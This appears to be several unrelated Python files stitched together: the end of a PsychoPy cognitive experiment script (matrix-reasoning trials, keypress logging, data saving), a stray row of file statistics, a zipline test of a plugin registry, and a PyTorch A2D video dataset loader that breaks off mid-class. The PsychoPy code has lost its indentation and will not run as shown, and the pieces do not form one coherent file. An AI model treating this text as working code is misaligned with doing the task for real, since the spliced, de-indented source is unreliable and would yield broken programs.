if t >= 0.0 and Prac2End.status == NOT_STARTED:
# keep track of start time/frame for later
Prac2End.tStart = t
Prac2End.frameNStart = frameN # exact frame index
Prac2End.status = STARTED
# keyboard checking is just starting
win.callOnFlip(Prac2End.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if Prac2End.status == STARTED:
theseKeys = event.getKeys()
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
Prac2End.keys = theseKeys[-1] # just the last key pressed
Prac2End.rt = Prac2End.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in Feedback2Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "Feedback2"-------
for thisComponent in Feedback2Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if Prac2End.keys in ['', [], None]: # No response was made
Prac2End.keys=None
trials_3.addData('Prac2End.keys',Prac2End.keys)
if Prac2End.keys != None: # we had a response
trials_3.addData('Prac2End.rt', Prac2End.rt)
# the Routine "Feedback2" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)
# update component parameters for each repeat
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = crosshairClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text* updates
if t >= 0.0 and text.status == NOT_STARTED:
# keep track of start time/frame for later
text.tStart = t
text.frameNStart = frameN # exact frame index
text.setAutoDraw(True)
frameRemains = 0.0 + 0.5- win.monitorFramePeriod * 0.75 # most of one frame period left
if text.status == STARTED and t >= frameRemains:
text.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.nextEntry()
# completed 1 repeats of 'trials_3'
# ------Prepare to start Routine "GetReady"-------
t = 0
GetReadyClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
GetReadyResp = event.BuilderKeyResponse()
# keep track of which components have finished
GetReadyComponents = [GetReady2, GetReadyResp]
for thisComponent in GetReadyComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "GetReady"-------
while continueRoutine:
# get current time
t = GetReadyClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *GetReady2* updates
if t >= 0.0 and GetReady2.status == NOT_STARTED:
# keep track of start time/frame for later
GetReady2.tStart = t
GetReady2.frameNStart = frameN # exact frame index
GetReady2.setAutoDraw(True)
# *GetReadyResp* updates
if t >= 0.0 and GetReadyResp.status == NOT_STARTED:
# keep track of start time/frame for later
GetReadyResp.tStart = t
GetReadyResp.frameNStart = frameN # exact frame index
GetReadyResp.status = STARTED
# keyboard checking is just starting
win.callOnFlip(GetReadyResp.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if GetReadyResp.status == STARTED:
theseKeys = event.getKeys()
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
GetReadyResp.keys = theseKeys[-1] # just the last key pressed
GetReadyResp.rt = GetReadyResp.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in GetReadyComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "GetReady"-------
for thisComponent in GetReadyComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if GetReadyResp.keys in ['', [], None]: # No response was made
GetReadyResp.keys=None
thisExp.addData('GetReadyResp.keys',GetReadyResp.keys)
if GetReadyResp.keys != None: # we had a response
thisExp.addData('GetReadyResp.rt', GetReadyResp.rt)
thisExp.nextEntry()
# the Routine "GetReady" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)
# update component parameters for each repeat
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = crosshairClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text* updates
if t >= 0.0 and text.status == NOT_STARTED:
# keep track of start time/frame for later
text.tStart = t
text.frameNStart = frameN # exact frame index
text.setAutoDraw(True)
frameRemains = 0.0 + 0.5- win.monitorFramePeriod * 0.75 # most of one frame period left
if text.status == STARTED and t >= frameRemains:
text.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# set up handler to look after randomisation of conditions etc
trials_2 = data.TrialHandler(nReps=1, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('Matrices.csv', selection='[2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]'),
seed=None, name='trials_2')
thisExp.addLoop(trials_2) # add the loop to the experiment
thisTrial_2 = trials_2.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial_2.rgb)
if thisTrial_2 != None:
for paramName in thisTrial_2.keys():
exec(paramName + '= thisTrial_2.' + paramName)
for thisTrial_2 in trials_2:
currentLoop = trials_2
# abbreviate parameter names if possible (e.g. rgb = thisTrial_2.rgb)
if thisTrial_2 != None:
for paramName in thisTrial_2.keys():
exec(paramName + '= thisTrial_2.' + paramName)
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
image.setImage(Stimulus)
image.setSize((430,380))
CFig1.setImage(Choice1)
CFig2.setImage(Choice2)
CFig3.setImage(Choice3)
CFig4.setImage(Choice4)
CFIg6.setImage(Choice6)
key_resp_2 = event.BuilderKeyResponse()
CFig7.setImage(Choice7)
CFig8.setImage(Choice8)
# keep track of which components have finished
trialComponents = [image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6, Opt1, Opt2, Opt3, Opt4, Opt5, key_resp_2, CFig7, CFig8, Opt6, Opt7, Opt8]
for thisComponent in trialComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
# get current time
t = trialClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *image* updates
if t >= 0.0 and image.status == NOT_STARTED:
# keep track of start time/frame for later
image.tStart = t
image.frameNStart = frameN # exact frame index
image.setAutoDraw(True)
# *CFig1* updates
if t >= 0.0 and CFig1.status == NOT_STARTED:
# keep track of start time/frame for later
CFig1.tStart = t
CFig1.frameNStart = frameN # exact frame index
CFig1.setAutoDraw(True)
# *CFig2* updates
if t >= 0.0 and CFig2.status == NOT_STARTED:
# keep track of start time/frame for later
CFig2.tStart = t
CFig2.frameNStart = frameN # exact frame index
CFig2.setAutoDraw(True)
# *CFig3* updates
if t >= 0.0 and CFig3.status == NOT_STARTED:
# keep track of start time/frame for later
CFig3.tStart = t
CFig3.frameNStart = frameN # exact frame index
CFig3.setAutoDraw(True)
# *CFig4* updates
if t >= 0.0 and CFig4.status == NOT_STARTED:
# keep track of start time/frame for later
CFig4.tStart = t
CFig4.frameNStart = frameN # exact frame index
CFig4.setAutoDraw(True)
# *CFig5* updates
if t >= 0.0 and CFig5.status == NOT_STARTED:
# keep track of start time/frame for later
CFig5.tStart = t
CFig5.frameNStart = frameN # exact frame index
CFig5.setAutoDraw(True)
if CFig5.status == STARTED: # only update if drawing
CFig5.setImage(Choice5, log=False)
# *CFIg6* updates
if t >= 0.0 and CFIg6.status == NOT_STARTED:
# keep track of start time/frame for later
CFIg6.tStart = t
CFIg6.frameNStart = frameN # exact frame index
CFIg6.setAutoDraw(True)
# *Opt1* updates
if t >= 0.0 and Opt1.status == NOT_STARTED:
# keep track of start time/frame for later
Opt1.tStart = t
Opt1.frameNStart = frameN # exact frame index
Opt1.setAutoDraw(True)
# *Opt2* updates
if t >= 0.0 and Opt2.status == NOT_STARTED:
# keep track of start time/frame for later
Opt2.tStart = t
Opt2.frameNStart = frameN # exact frame index
Opt2.setAutoDraw(True)
# *Opt3* updates
if t >= 0.0 and Opt3.status == NOT_STARTED:
# keep track of start time/frame for later
Opt3.tStart = t
Opt3.frameNStart = frameN # exact frame index
Opt3.setAutoDraw(True)
# *Opt4* updates
if t >= 0.0 and Opt4.status == NOT_STARTED:
# keep track of start time/frame for later
Opt4.tStart = t
Opt4.frameNStart = frameN # exact frame index
Opt4.setAutoDraw(True)
# *Opt5* updates
if t >= 0.0 and Opt5.status == NOT_STARTED:
# keep track of start time/frame for later
Opt5.tStart = t
Opt5.frameNStart = frameN # exact frame index
Opt5.setAutoDraw(True)
# *key_resp_2* updates
if t >= 0.0 and key_resp_2.status == NOT_STARTED:
# keep track of start time/frame for later
key_resp_2.tStart = t
key_resp_2.frameNStart = frameN # exact frame index
key_resp_2.status = STARTED
# keyboard checking is just starting
win.callOnFlip(key_resp_2.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if key_resp_2.status == STARTED:
theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
key_resp_2.keys = theseKeys[-1] # just the last key pressed
key_resp_2.rt = key_resp_2.clock.getTime()
# was this 'correct'?
if (key_resp_2.keys == str(Corr)) or (key_resp_2.keys == Corr):
key_resp_2.corr = 1
else:
key_resp_2.corr = 0
# a response ends the routine
continueRoutine = False
# *CFig7* updates
if t >= 0.0 and CFig7.status == NOT_STARTED:
# keep track of start time/frame for later
CFig7.tStart = t
CFig7.frameNStart = frameN # exact frame index
CFig7.setAutoDraw(True)
# *CFig8* updates
if t >= 0.0 and CFig8.status == NOT_STARTED:
# keep track of start time/frame for later
CFig8.tStart = t
CFig8.frameNStart = frameN # exact frame index
CFig8.setAutoDraw(True)
# *Opt6* updates
if t >= 0.0 and Opt6.status == NOT_STARTED:
# keep track of start time/frame for later
Opt6.tStart = t
Opt6.frameNStart = frameN # exact frame index
Opt6.setAutoDraw(True)
# *Opt7* updates
if t >= 0.0 and Opt7.status == NOT_STARTED:
# keep track of start time/frame for later
Opt7.tStart = t
Opt7.frameNStart = frameN # exact frame index
Opt7.setAutoDraw(True)
# *Opt8* updates
if t >= 0.0 and Opt8.status == NOT_STARTED:
# keep track of start time/frame for later
Opt8.tStart = t
Opt8.frameNStart = frameN # exact frame index
Opt8.setAutoDraw(True)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in trialComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if key_resp_2.keys in ['', [], None]: # No response was made
key_resp_2.keys=None
# was no response the correct answer?!
if str(Corr).lower() == 'none':
key_resp_2.corr = 1 # correct non-response
else:
key_resp_2.corr = 0 # failed to respond (incorrectly)
# store data for trials_2 (TrialHandler)
trials_2.addData('key_resp_2.keys',key_resp_2.keys)
trials_2.addData('key_resp_2.corr', key_resp_2.corr)
if key_resp_2.keys != None: # we had a response
trials_2.addData('key_resp_2.rt', key_resp_2.rt)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)
# update component parameters for each repeat
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = crosshairClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text* updates
if t >= 0.0 and text.status == NOT_STARTED:
# keep track of start time/frame for later
text.tStart = t
text.frameNStart = frameN # exact frame index
text.setAutoDraw(True)
frameRemains = 0.0 + 0.5- win.monitorFramePeriod * 0.75 # most of one frame period left
if text.status == STARTED and t >= frameRemains:
text.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.nextEntry()
# completed 1 repeats of 'trials_2'
# ------Prepare to start Routine "ThankYou"-------
t = 0
ThankYouClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(3.000000)
# update component parameters for each repeat
# keep track of which components have finished
ThankYouComponents = [text_2]
for thisComponent in ThankYouComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "ThankYou"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = ThankYouClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text_2* updates
if t >= 0.0 and text_2.status == NOT_STARTED:
# keep track of start time/frame for later
text_2.tStart = t
text_2.frameNStart = frameN # exact frame index
text_2.setAutoDraw(True)
frameRemains = 0.0 + 3- win.monitorFramePeriod * 0.75 # most of one frame period left
if text_2.status == STARTED and t >= frameRemains:
text_2.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in ThankYouComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "ThankYou"-------
for thisComponent in ThankYouComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 39.903857 | 443 | 0.617957 | 9,260 | 73,463 | 4.868467 | 0.062419 | 0.004481 | 0.020252 | 0.017324 | 0.863782 | 0.847145 | 0.837496 | 0.82554 | 0.811987 | 0.800785 | 0 | 0.041063 | 0.271361 | 73,463 | 1,840 | 444 | 39.925543 | 0.801151 | 0.252944 | 0 | 0.836782 | 0 | 0.003831 | 0.059847 | 0.002301 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008429 | 0 | 0.008429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f1d737d3a7f0427f0cafa4a5dd8505b834f61f8 | 3,699 | py | Python | tests/test_registration_manager.py | Hertz-and-Alpha/zipline-reloaded | eea4a2ccfc03d7fa4946defcb3cdf23469e4ae39 | [
"Apache-2.0"
] | 254 | 2021-03-29T16:18:39.000Z | 2022-03-31T22:06:01.000Z | tests/test_registration_manager.py | Hertz-and-Alpha/zipline-reloaded | eea4a2ccfc03d7fa4946defcb3cdf23469e4ae39 | [
"Apache-2.0"
] | 52 | 2021-04-06T01:46:24.000Z | 2022-03-29T20:54:19.000Z | tests/test_registration_manager.py | Hertz-and-Alpha/zipline-reloaded | eea4a2ccfc03d7fa4946defcb3cdf23469e4ae39 | [
"Apache-2.0"
] | 53 | 2021-04-05T14:43:29.000Z | 2022-03-31T22:06:04.000Z | from zipline.extensions import Registry
import pytest
import re
class FakeInterface:
pass
class TestRegistrationManager:
def test_load_not_registered(self):
rm = Registry(FakeInterface)
msg = (
"no FakeInterface factory registered under name 'ayy-lmao',"
" options are: []"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
# register in reverse order to test the sorting of the options
rm.register("c", FakeInterface)
rm.register("b", FakeInterface)
rm.register("a", FakeInterface)
msg = (
"no FakeInterface factory registered under name 'ayy-lmao', "
"options are: ['a', 'b', 'c']"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
def test_register_decorator(self):
rm = Registry(FakeInterface)
@rm.register("ayy-lmao")
class ProperDummyInterface(FakeInterface):
pass
def check_registered():
assert rm.is_registered(
"ayy-lmao"
), "Class ProperDummyInterface wasn't properly registered under \n name 'ayy-lmao'"
assert isinstance(rm.load("ayy-lmao"), ProperDummyInterface)
# Check that we successfully registered.
check_registered()
# Try and fail to register with the same key again.
msg = "FakeInterface factory with name 'ayy-lmao' is already registered"
with pytest.raises(ValueError, match=msg):
@rm.register("ayy-lmao")
class Fake(object):
pass
# assert excinfo.value.args == msg
# check that the failed registration didn't break the previous
# registration
check_registered()
# Unregister the key and assert that the key is now gone.
rm.unregister("ayy-lmao")
msg = (
"no FakeInterface factory registered under name 'ayy-lmao', "
"options are: []"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
msg = "FakeInterface factory 'ayy-lmao' was not already registered"
with pytest.raises(ValueError, match=msg):
rm.unregister("ayy-lmao")
def test_register_non_decorator(self):
rm = Registry(FakeInterface)
class ProperDummyInterface(FakeInterface):
pass
rm.register("ayy-lmao", ProperDummyInterface)
def check_registered():
assert rm.is_registered(
"ayy-lmao"
), "Class ProperDummyInterface wasn't properly registered under name 'ayy-lmao'"
assert isinstance(rm.load("ayy-lmao"), ProperDummyInterface)
# Check that we successfully registered.
check_registered()
class Fake(object):
pass
# Try and fail to register with the same key again.
msg = "FakeInterface factory with name 'ayy-lmao' is already registered"
with pytest.raises(ValueError, match=msg):
rm.register("ayy-lmao", Fake)
# check that the failed registration didn't break the previous
# registration
check_registered()
rm.unregister("ayy-lmao")
msg = (
"no FakeInterface factory registered under name 'ayy-lmao', "
"options are: []"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
msg = "FakeInterface factory 'ayy-lmao' was not already registered"
with pytest.raises(ValueError, match=msg):
rm.unregister("ayy-lmao")
| 31.347458 | 95 | 0.602325 | 399 | 3,699 | 5.54386 | 0.195489 | 0.082278 | 0.039783 | 0.094033 | 0.78255 | 0.724231 | 0.724231 | 0.724231 | 0.724231 | 0.724231 | 0 | 0 | 0.301433 | 3,699 | 117 | 96 | 31.615385 | 0.856037 | 0.128413 | 0 | 0.74026 | 0 | 0 | 0.261208 | 0 | 0 | 0 | 0 | 0 | 0.051948 | 1 | 0.064935 | false | 0.064935 | 0.038961 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
6f5694943b63c88aa038b1e94e101ad9b77c88c6 | 14,938 | py | Python | csc_249_final_proj_a2d_cls/loader/a2d_dataset.py | Brainsanity/VisualCortex_ActorAction | a4ad3951aa78a98d9f876f323bcbaba7cd48180c | [
"MIT"
] | null | null | null | csc_249_final_proj_a2d_cls/loader/a2d_dataset.py | Brainsanity/VisualCortex_ActorAction | a4ad3951aa78a98d9f876f323bcbaba7cd48180c | [
"MIT"
] | null | null | null | csc_249_final_proj_a2d_cls/loader/a2d_dataset.py | Brainsanity/VisualCortex_ActorAction | a4ad3951aa78a98d9f876f323bcbaba7cd48180c | [
"MIT"
] | null | null | null | import os
import sys
sys.path.append('')
import random
import numpy as np
import cv2
import h5py
import torch
from torch.utils.data import Dataset, DataLoader
import loader.transforms as tf
from cfg.deeplab_pretrain_a2d import train as train_cfg
from cfg.deeplab_pretrain_a2d import val as val_cfg
from cfg.deeplab_pretrain_a2d import test as test_cfg
from torchvision import transforms
def to_cls(image_label, num_class):
'''
:param image_label:
:return: label encoding for multi-label multi-class training
'''
image_label.flatten()
label = np.zeros(num_class)
for i in range(num_class):
if i in image_label:
label[i] = 1
return label
class A2DDataset(Dataset):
#num_class = 43
num_class_orig = 80
ignore_label = 255
background_label = 0
# 35+8=43 valid classes
valid_cls = [
11, 12, 13, 15, 16, 17, 18, 19, # 1-8
21, 22, 26, 28, 29, # 9-13
34, 35, 36, 39, # 14-17
41, 43, 44, 45, 46, 48, 49, # 18-24
54, 55, 56, 57, 59, # 25-29
61, 63, 65, 66, 67, 68, 69, # 30-36
72, 73, 75, 76, 77, 78, 79] # 37-43
num_valid_cls = len(valid_cls)
convert_label = dict()
convert_label_back = dict()
for i, label in enumerate(valid_cls):
convert_label[label] = i
convert_label_back[i] = label
label_80to43 = np.ones((num_class_orig))*255
for label in range(num_class_orig):
if label in convert_label:
label_80to43[label] = convert_label[label]
label_80to43 = label_80to43.astype(np.uint8)
#print(label_80to43)
label_43to80 = np.ones((num_valid_cls))*255
for i in range(num_valid_cls):
label_43to80[i] = convert_label_back[i]
label_43to80 = label_43to80.astype(np.uint8)
# official color map
cmap = np.array([[0,0,0], # 0
#[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[52,1,1],[103,1,1],[154,1,1],[205,1,1],[255,1,1], # 11-15
[255,51,51],[255,103,103],[255,154,154],[255,205,205],[0,0,0], # 16-20
[52,46,1],[103,92,1],[154,138,1],[205,184,1],[255,230,1], # 21-25
[255,235,51],[255,240,103],[255,245,154],[255,250,205],[0,0,0], # 26-30
[11,52,1],[21,103,1],[31,154,1],[41,205,1],[52,255,1], # 31-35
[92,255,51],[133,255,103],[174,255,154],[215,255,205],[0,0,0], # 36-40
[1,52,36],[1,103,72],[1,154,108],[1,205,143],[1,255,179], #41-45
[51,255,194],[103,255,210],[154,255,225],[205,255,240],[0,0,0], # 46-50
[1,21,52],[1,41,103],[1,62,154],[1,82,205],[1,103,255], # 51-55
[51,133,255],[103,164,255],[154,194,255],[205,225,255],[0,0,0], # 56-60
[26,1,52],[52,1,103],[77,1,154],[103,1,205],[128,1,255], # 61-65
[154,51,255],[179,103,255],[205,154,255],[230,205,255],[0,0,0], #66-70
[52,1,31],[103,1,62],[154,1,92],[205,1,123],[255,1,153], #71-75
[255,51,174],[255,103,194],[255,154,215],[255,205,235] #76-79
])
cmap = cmap.astype(np.uint8)
# 80=1(bg) + 9+7(none) + 7(actor)*9(action)
class_names = np.array([
'background',
'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none',
'none',
'adult-climbing',
'adult-crawling',
'adult-eating',
'adult-flying',
'adult-jumping',
'adult-rolling',
'adult-running',
'adult-walking',
'adult-none',
'none',
'baby-climbing',
'baby-crawling',
'baby-eating',
'baby-flying',
'baby-jumping',
'baby-rolling',
'baby-running',
'baby-walking',
'baby-none',
'none',
'ball-climbing',
'ball-crawling',
'ball-eating',
'ball-flying',
'ball-jumping',
'ball-rolling',
'ball-running',
'ball-walking',
'ball-none',
'none',
'bird-climbing',
'bird-crawling',
'bird-eating',
'bird-flying',
'bird-jumping',
'bird-rolling',
'bird-running',
'bird-walking',
'bird-none',
'none',
'car-climbing',
'car-crawling',
'car-eating',
'car-flying',
'car-jumping',
'car-rolling',
'car-running',
'car-walking',
'car-none',
'none',
'cat-climbing',
'cat-crawling',
'cat-eating',
'cat-flying',
'cat-jumping',
'cat-rolling',
'cat-running',
'cat-walking',
'cat-none',
'none',
'dog-climbing',
'dog-crawling',
'dog-eating',
'dog-flying',
'dog-jumping',
'dog-rolling',
'dog-running',
'dog-walking',
'dog-none',
])
def __init__(self, config, dataset_path):
super(A2DDataset, self).__init__()
with open(
os.path.join(dataset_path, 'list',
config.data_list + '.txt')) as f:
self.img_list = []
for line in f:
if line[-1] == '\n':
self.img_list.append(line[:-1])
else:
self.img_list.append(line)
self.img_dir = os.path.join(dataset_path, 'pngs320H')
self.gt_dir = os.path.join(dataset_path, 'Annotations/mat')
self.config = config
self.class_names = [A2DDataset.class_names[cls] for cls in A2DDataset.valid_cls]
def __len__(self):
return len(self.img_list)
def __getitem__(self, idx):
vd_frame_idx = self.img_list[idx]
image_path = os.path.join(self.img_dir, vd_frame_idx + '.png')
image = cv2.imread(image_path).astype(np.float32)
gt_load_path = os.path.join(self.gt_dir, vd_frame_idx + '.mat')
label_orig = h5py.File(gt_load_path,'r')['reS_id']
label_orig = np.transpose(label_orig)
label = label_orig #A2DDataset.label_80to43[label_orig]
# flip
if hasattr(self.config, 'flip') and self.config.flip:
image, label = tf.group_random_flip([image, label])
if hasattr(self.config, 'crop_policy'):
target_size = self.config.crop_size
if self.config.crop_policy == 'none':
# resize
image, label = tf.group_rescale([image, label],
#self.config.scale_factor,
target_size,
[cv2.INTER_LINEAR, cv2.INTER_NEAREST])
else:
# resize -> crop -> pad
image, label = tf.group_rescale([image, label],
self.config.scale_factor,
[cv2.INTER_LINEAR, cv2.INTER_NEAREST])
if self.config.crop_policy == 'random':
image, label = tf.group_random_crop([image, label], target_size)
image, label = tf.group_random_pad(
[image, label], target_size,
[self.config.input_mean, A2DDataset.background_label])
elif self.config.crop_policy == 'center':
image, label = tf.group_center_crop([image, label], target_size)
image, label = tf.group_concer_pad(
[image, label], target_size,
[self.config.input_mean, A2DDataset.background_label])
else:
ValueError('Unknown crop policy: {}'.format(
self.config.crop_policy))
if hasattr(self.config, 'rotation') and random.random() < 0.5:
image, label = tf.group_rotation(
[image, label], self.config.rotation,
[cv2.INTER_LINEAR, cv2.INTER_NEAREST],
[self.config.input_mean, A2DDataset.background_label])
# blur
if hasattr(self.config,
'blur') and self.config.blur and random.random() < 0.5:
image = tf.blur(image)
image = cv2.resize(image, (224, 224))
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406),
(0.229, 0.224, 0.225))])
image = transform(image)
image = image.contiguous().float()
label = A2DDataset.label_80to43[label_orig]
label = to_cls(label, 43)
label = torch.from_numpy(label).contiguous().long()
return image, label
class A2DDataset_test(Dataset):
num_class_orig = 80
ignore_label = 255
background_label = 0
# 35+8=43 valid classes
valid_cls = [
11, 12, 13, 15, 16, 17, 18, 19, # 1-8
21, 22, 26, 28, 29, # 9-13
34, 35, 36, 39, # 14-17
41, 43, 44, 45, 46, 48, 49, # 18-24
54, 55, 56, 57, 59, # 25-29
61, 63, 65, 66, 67, 68, 69, # 30-36
72, 73, 75, 76, 77, 78, 79] # 37-43
num_valid_cls = len(valid_cls)
convert_label = dict()
convert_label_back = dict()
for i, label in enumerate(valid_cls):
convert_label[label] = i
convert_label_back[i] = label
label_80to43 = np.ones((num_class_orig))*255
for label in range(num_class_orig):
if label in convert_label:
label_80to43[label] = convert_label[label]
